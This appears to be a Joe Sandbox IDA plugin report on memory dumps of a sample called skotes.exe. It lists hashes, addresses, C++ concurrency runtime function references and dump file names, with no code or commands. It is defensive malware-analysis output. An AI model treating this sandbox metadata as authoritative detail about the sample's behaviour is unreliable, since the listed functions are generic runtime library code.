                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3844194624-0
                                                                                                                                            • Opcode ID: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                            • Instruction ID: 4390401d6086083c4ed679f6182fa8b71465f7569f6c9b8c6cc6026deb80f4b9
                                                                                                                                            • Opcode Fuzzy Hash: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                            • Instruction Fuzzy Hash: 9101D131200561AFCB25BB62CF86E6EB76ABF45720704512AF8019B612DF24EC6296A0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00AF33DB
                                                                                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00AF33EF
                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00AF3407
                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AF341F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 78362717-0
                                                                                                                                            • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                            • Instruction ID: c9c21e3dc629dc8d7dbbfb680c021f06c61d6d5fe1c8105d070acfaa3fd087e6
                                                                                                                                            • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                            • Instruction Fuzzy Hash: 2201D133B00518A7CF16FEE58941AFFB7A99F54755F100055FE12AB282DA71EE0097A0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00AE9519
                                                                                                                                              • Part of subcall function 00ADF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00AE5486
                                                                                                                                            • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00AE953D
                                                                                                                                            • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00AE9550
                                                                                                                                            • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00AE9559
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 218105897-0
                                                                                                                                            • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                            • Instruction ID: fea654ba2275b131ce2dbb49427111535de8f89a005a9d38dee4b17936f00b9b
                                                                                                                                            • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                            • Instruction Fuzzy Hash: 6FF0A071200B605EE662ABAA8911F6B23E49F40711F00841EE52F9B283CE24E846CBA0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::critical_section::unlock.LIBCMT ref: 00ADEFD1
                                                                                                                                              • Part of subcall function 00ADF968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00ADF989
                                                                                                                                              • Part of subcall function 00ADF968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00ADF9C0
                                                                                                                                              • Part of subcall function 00ADF968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00ADF9CC
                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00ADEFDD
                                                                                                                                              • Part of subcall function 00ADF40F: Concurrency::critical_section::unlock.LIBCMT ref: 00ADF433
                                                                                                                                            • Concurrency::Context::Block.LIBCONCRT ref: 00ADEFE2
                                                                                                                                              • Part of subcall function 00AE0366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00AE0368
                                                                                                                                            • Concurrency::critical_section::lock.LIBCONCRT ref: 00ADF002
                                                                                                                                              • Part of subcall function 00ADF891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00ADF8AC
                                                                                                                                              • Part of subcall function 00ADF891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00ADF8B7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 811866635-0
                                                                                                                                            • Opcode ID: 3a06db054d122d171ddeba9d97f0f6663f31897508d803bc2b14d244af0b134c
                                                                                                                                            • Instruction ID: de4a5bf88e153af2e14fd3f0ddc3d31427d17c20a6272dec18ad4ab848d99909
                                                                                                                                            • Opcode Fuzzy Hash: 3a06db054d122d171ddeba9d97f0f6663f31897508d803bc2b14d244af0b134c
                                                                                                                                            • Instruction Fuzzy Hash: BBE04F34900545AFCB04FB20DA655AEBB61BF44360B54831AE477173E2CF746E86CB81
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00AFDFE8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
